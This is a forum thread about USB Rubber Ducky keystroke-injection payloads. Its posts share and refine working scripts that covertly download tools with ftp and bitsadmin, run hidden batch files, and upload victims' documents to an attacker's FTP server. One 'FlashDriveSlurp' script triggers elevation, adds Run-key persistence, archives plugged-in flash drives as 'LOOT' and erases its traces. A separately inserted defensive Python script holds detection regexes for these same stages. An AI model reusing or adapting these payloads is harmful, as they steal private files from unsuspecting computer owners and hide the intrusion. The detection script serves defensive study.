ebmar Posted December 2, 2014

Hi. Just bought the rubber ducky and I love this little gadget! I figured out how to copy files from just My Documents (see code below), but I have a problem going through subfolders. I want to do this basically: get a batch job to search My Documents and all subfolders for file extensions .docx, .doc etc. and upload them with WinSCP. Also I want it to search for a removable USB drive and search for .docx in the root and all subfolders. I searched a lot and all examples say that you have to know the drive name (not letter). I have no idea how to go from here.

This is my script for hidden copy so far:

Rubber ducky.txt:

DELAY 200
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING cd %USERPROFILE%
ENTER
STRING ftp -i IP_ADDRESS
ENTER
DELAY 200
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET invisible.bat
ENTER
DELAY 200
STRING GET invisible.vbs
ENTER
DELAY 200
STRING BYE
ENTER
DELAY 200
STRING wscript.exe invisible.vbs invisible.bat
ENTER
DELAY 200
STRING exit
ENTER

It takes the rubber ducky about 6 sec from when you put it into the computer until you unplug it to download the files and run them hidden.

invisible.vbs:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

This is to run the .bat hidden.

invisible.bat:

bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe"
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com"
cd %USERPROFILE%\documents
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.doc" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.docx" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.pdf" "close" "exit"

This script runs in the background: bitsadmin to download WinSCP, and WinSCP to upload files to an FTP server. If you find the above scripts useful feel free to redistribute them as you wish. And thanks in advance.
Broti Posted December 2, 2014

Hi and welcome, nice and clean payload. Gotta test it... I love the ducky, too. It's part of my toolkit.
ebmar Posted December 4, 2014 (Author)

I have almost no experience scripting, and I'm pretty much a retard when it comes to scripting, but I found out how to upload a whole folder with WinSCP. This is my new invisible.bat:

bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe"
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *documents" "close" "exit"

I removed changing directory to documents, and changed WinSCP to just copy the whole documents directory. The problem with this is that if the directory has a whole lot of large videos it would take a lot of time, meaning the computer must stay online over a long period of time. Does anybody know how to copy only certain files in a folder and all subfolders?
overwraith Posted December 4, 2014 (edited)

You should look for some articles on Stack Overflow or something for recursing directories. Typically done with a for loop, I think. Another thing you could do is archive the folder in question, which will typically include all sub directories, save the archive someplace else on the system, and upload the archive to the destination server.

This should install 7zip on a computer, but will not install if users are not admins:

GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/project/sevenzip/7-Zip/9.20/7z920.exe?r=http%3A%2F%2Fwww.7-zip.org%2F&ts=1384902016&use_mirror=softlayer-dal','%TEMP%\7z920.exe'); Start-Process "%TEMP%\7z920.exe /S /D=%PROGRAMFILES%\7-Zip\"
ENTER

I think this is a working script; it is for gathering flashdrives that are plugged into a system. If not, then there are two other files in its directory, so I may have to test later which one actually works.

REM Author: overwraith
REM Name: FlashDriveSlurp3.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration.
REM Encoder V2.4+
REM *** Initial Delay ***
DELAY 2000
REM *** Bypass UAC ***
REM Using the run command for a broader OS base.
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER
REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER
REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER
REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
DELAY 500
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER
REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER
REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
REM *** Registry key that restarts script on reboot. ***
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\FlashDriveSlurp.bat" /f
ENTER
REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING if NOT EXIST %destination% mkdir %destination%
ENTER
STRING :while1
ENTER
REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f %%A in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set DUCKYdrive=%%A
ENTER
STRING if [%DUCKYdrive%] NEQ [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
REM *** Get the attached flash drives letters and drive name's. ***
STRING set letters=
ENTER
STRING set drivename=
ENTER
STRING for /F "tokens=1,3 delims= " %%A in ('wmic volume get driveletter^, drivetype^, label^, SystemVolume ^| findstr /V "System Reserved" ^| findstr/V "DUCKY" ^| findstr "2" ^| findstr "FALSE"') do (
STRING if [%%A] NEQ [] (
ENTER
STRING if [%%B] NEQ [] (
ENTER
STRING set letters=!letters! %%A
ENTER
STRING set drivename=!drivename! %%B
ENTER
STRING )))
ENTER
REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array.
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM *** Copy to the ducky drive. ***
STRING xcopy %destination%\* %DUCKYdrive%\LOOT\%COMPUTERNAME% /I
ENTER
REM *** Terminate execution, clean up after script. ***
STRING erase /Q *.7z
ENTER
STRING rmdir /S /Q %TEMP%\LOOT
ENTER
STRING erase invis.vbs
ENTER
STRING erase /Q %0
ENTER
CONTROL z
ENTER
REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER
REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER
REM *** Exit ***
STRING EXIT
ENTER
STRING EXIT
ENTER

One of the hardest things about batch is knowing to enable delayed expansion, which means that if you have a variable referenced twice in a for loop, batch needs to take that into account.

C:\Users\UserName>for /?
Runs a specified command for each file in a set of files.

FOR %variable IN (set) DO command [command-parameters]

  %variable  Specifies a single letter replaceable parameter.
  (set)      Specifies a set of one or more files.  Wildcards may be used.
  command    Specifies the command to carry out for each file.
  command-parameters
             Specifies parameters or switches for the specified command.

To use the FOR command in a batch program, specify %%variable instead
of %variable.  Variable names are case sensitive, so %i is different
from %I.

If Command Extensions are enabled, the following additional
forms of the FOR command are supported:

FOR /D %variable IN (set) DO command [command-parameters]

    If set contains wildcards, then specifies to match against directory
    names instead of file names.

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]

    Walks the directory tree rooted at [drive:]path, executing the FOR
    statement in each directory of the tree.  If no directory
    specification is specified after /R then the current directory is
    assumed.  If set is just a single period (.) character then it
    will just enumerate the directory tree.

FOR /L %variable IN (start,step,end) DO command [command-parameters]

    The set is a sequence of numbers from start to end, by step amount.
    So (1,1,5) would generate the sequence 1 2 3 4 5 and (5,-1,1) would
    generate the sequence (5 4 3 2 1)

FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ("string") DO command [command-parameters]
FOR /F ["options"] %variable IN ('command') DO command [command-parameters]

    or, if usebackq option present:

FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ('string') DO command [command-parameters]
FOR /F ["options"] %variable IN (`command`) DO command [command-parameters]

    file-set is one or more file names.  Each file is opened, read
    and processed before going on to the next file in file-set.
    Processing consists of reading in the file, breaking it up into
    individual lines of text and then parsing each line into zero or
    more tokens.  The body of the for loop is then called with the
    variable value(s) set to the found token string(s).  By default, /F
    passes the first blank separated token from each line of each file.
    Blank lines are skipped.  You can override the default parsing
    behavior by specifying the optional "options" parameter.  This is a
    quoted string which contains one or more keywords to specify
    different parsing options.  The keywords are:

        eol=c           - specifies an end of line comment character
                          (just one)
        skip=n          - specifies the number of lines to skip at the
                          beginning of the file.
        delims=xxx      - specifies a delimiter set.  This replaces the
                          default delimiter set of space and tab.
        tokens=x,y,m-n  - specifies which tokens from each line are to
                          be passed to the for body for each iteration.
                          This will cause additional variable names to
                          be allocated.  The m-n form is a range,
                          specifying the mth through the nth tokens.  If
                          the last character in the tokens= string is an
                          asterisk, then an additional variable is
                          allocated and receives the remaining text on
                          the line after the last token parsed.
        usebackq        - specifies that the new semantics are in force,
                          where a back quoted string is executed as a
                          command and a single quoted string is a
                          literal string command and allows the use of
                          double quotes to quote file names in
                          file-set.

    Some examples might help:

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

    would parse each line in myfile.txt, ignoring lines that begin with
    a semicolon, passing the 2nd and 3rd token from each line to the for
    body, with tokens delimited by commas and/or spaces.  Notice the for
    body statements reference %i to get the 2nd token, %j to get the
    3rd token, and %k to get all remaining tokens after the 3rd.  For
    file names that contain spaces, you need to quote the filenames with
    double quotes.  In order to use double quotes in this manner, you also
    need to use the usebackq option, otherwise the double quotes will be
    interpreted as defining a literal string to parse.

    %i is explicitly declared in the for statement and the %j and %k
    are implicitly declared via the tokens= option.  You can specify up
    to 26 tokens via the tokens= line, provided it does not cause an
    attempt to declare a variable higher than the letter 'z' or 'Z'.
    Remember, FOR variables are single-letter, case sensitive, global,
    and you can't have more than 52 total active at any one time.

    You can also use the FOR /F parsing logic on an immediate string, by
    making the file-set between the parenthesis a quoted string,
    using single quote characters.  It will be treated as a single line
    of input from a file and parsed.

    Finally, you can use the FOR /F command to parse the output of a
    command.  You do this by making the file-set between the
    parenthesis a back quoted string.  It will be treated as a command
    line, which is passed to a child CMD.EXE and the output is captured
    into memory and parsed as if it was a file.  So the following
    example:

      FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

    would enumerate the environment variable names in the current
    environment.

In addition, substitution of FOR variable references has been enhanced.
You can now use the following optional syntax:

    %~I         - expands %I removing any surrounding quotes (")
    %~fI        - expands %I to a fully qualified path name
    %~dI        - expands %I to a drive letter only
    %~pI        - expands %I to a path only
    %~nI        - expands %I to a file name only
    %~xI        - expands %I to a file extension only
    %~sI        - expanded path contains short names only
    %~aI        - expands %I to file attributes of file
    %~tI        - expands %I to date/time of file
    %~zI        - expands %I to size of file
    %~$PATH:I   - searches the directories listed in the PATH
                   environment variable and expands %I to the
                   fully qualified name of the first one found.
                   If the environment variable name is not
                   defined or the file is not found by the
                   search, then this modifier expands to the
                   empty string

The modifiers can be combined to get compound results:

    %~dpI       - expands %I to a drive letter and path only
    %~nxI       - expands %I to a file name and extension only
    %~fsI       - expands %I to a full path name with short names only
    %~dp$PATH:I - searches the directories listed in the PATH
                   environment variable for %I and expands to the
                   drive letter and path of the first one found.
    %~ftzaI     - expands %I to a DIR like output line

In the above examples %I and PATH can be replaced by other valid
values.  The %~ syntax is terminated by a valid FOR variable name.
Picking upper case variable names like %I makes it more readable and
avoids confusion with the modifiers, which are not case sensitive.

C:\Users\UserName>

Edited December 4, 2014 by overwraith
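Added here for the defensive side, and not part of any post in this thread: a small Python triage script that runs detection logic over constructed process-creation log lines covering the stages the payloads in this thread chain together (ftp -i staging, bitsadmin /Transfer download, wscript launching a .vbs that runs a .bat hidden, WinSCP.com uploading over cleartext FTP with embedded credentials, a Run key pointing at wscript, and wmic volume enumeration of removable drives). The event format, the rule names and every sample value are assumptions of the example; the point it makes is the correlation, since any single stage is ordinary admin activity while several in sequence under one cmd.exe ancestry are the signal.

```python
import re

# Constructed sample process-creation events, one per line in a simplified
# "parent -> image commandline" form (not taken from any real host). The
# malicious lines mirror the stages the thread's payloads perform: a staged
# download, a hidden launcher, a cleartext FTP upload, Run-key persistence,
# and removable-drive enumeration. The last two lines are benign admin noise.
SAMPLE_EVENTS = [
    r'explorer.exe -> C:\Windows\System32\cmd.exe cmd',
    r'cmd.exe -> C:\Windows\System32\ftp.exe ftp -i 203.0.113.5',
    r'cmd.exe -> C:\Windows\System32\wscript.exe wscript.exe invisible.vbs invisible.bat',
    r'cmd.exe -> C:\Windows\System32\bitsadmin.exe bitsadmin /Transfer JobName http://example.invalid/WinSCP.exe "C:\Users\u\WinSCP.exe"',
    r'cmd.exe -> C:\Users\u\WinSCP.com "C:\Users\u\WinSCP.com" /command "option batch abort" "open ftp://USER:PASSWORD@203.0.113.5" "put *.docx" "exit"',
    r'cmd.exe -> C:\Windows\System32\reg.exe REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe C:\Users\u\AppData\Local\Temp\invis.vbs C:\Users\u\AppData\Local\Temp\FlashDriveSlurp.bat" /f',
    r'cmd.exe -> C:\Windows\System32\wbem\WMIC.exe wmic volume where "drivetype=2" get driveletter',
    r'svchost.exe -> C:\Windows\System32\bitsadmin.exe bitsadmin /list',
    r'explorer.exe -> C:\Program Files\WinSCP\WinSCP.exe WinSCP.exe',
]

# Each rule names one stage of the payload chain and matches its command line.
RULES = [
    ("ftp_cli_download", re.compile(r'\bftp(\.exe)?\s+-i\b', re.I)),
    ("bitsadmin_download", re.compile(r'bitsadmin(\.exe)?\s+/transfer\b.*https?://', re.I)),
    ("hidden_vbs_launcher", re.compile(r'wscript(\.exe)?\s+\S+\.vbs\s+\S+\.bat', re.I)),
    ("winscp_cleartext_upload", re.compile(r'winscp\.com.*/command.*open\s+ftp://[^"\s]+:[^"\s]+@', re.I)),
    ("run_key_persistence", re.compile(r'reg(\.exe)?\s+add\s+hk(lm|cu)\\.*\\run\b.*wscript', re.I)),
    ("removable_drive_enum", re.compile(r'wmic(\.exe)?\s+volume\b.*\bdrivetype\b', re.I)),
]

def classify(event):
    """Return the names of every rule that fires on one event line."""
    return [name for name, rx in RULES if rx.search(event)]

def triage(events):
    """Group events by rule. A host that trips several distinct stages in a
    short window is the strongest signal, because each stage on its own can
    be legitimate admin activity (compare the two benign sample lines)."""
    hits = {}
    for event in events:
        for name in classify(event):
            hits.setdefault(name, []).append(event)
    return hits

if __name__ == "__main__":
    for name, events in triage(SAMPLE_EVENTS).items():
        print(f"[{name}] {len(events)} event(s)")
        for event in events:
            print("   ", event)
```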
ebmar Posted December 4, 2014 (Author)

I tried to make sense of and modify the script so I can use it, but I'm not that good at scripting. When I run the command:

wmic volume where "drivetype=2" get driveletter /format:table | findstr :

I get the list of removable USB discs, but I don't know how to cd into that drive using the information wmic gave me. It's usually only one removable device attached.

On the other hand! I got the script working to copy all subfolders in Documents, but I found it easier and faster to make it only copy certain filetypes (if it would contain large movies etc.).

wscript.exe invisible.vbs wget.bat

REM Download WinSCP
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe"
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com"
REM Upload documents in Documents
cd %USERPROFILE%\documents
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.doc" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.docx" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.pdf" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.ppt" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.pptx" "close" "exit"
REM Upload documents in subdirs
cd %USERPROFILE%
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.doc" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.docx" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.pdf" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.ppt" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.pptx" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"

The other files are the same as of now.
overwraith Posted December 4, 2014

So for getting attached drives you use a command like this:

for /F "tokens=1,3 delims= " %%A in ('wmic volume get driveletter^, drivetype^, label^, SystemVolume ^| findstr /V "System Reserved" ^| findstr/V "DUCKY" ^| findstr "2" ^| findstr "FALSE"') do (

So in order to change directories to that drive you don't use CD in the prompt, because cd doesn't change drives; it won't do anything. You need to type something along the lines of:

D:

So inside a loop it would be something like this:

%%i:

where "i" is your iterator.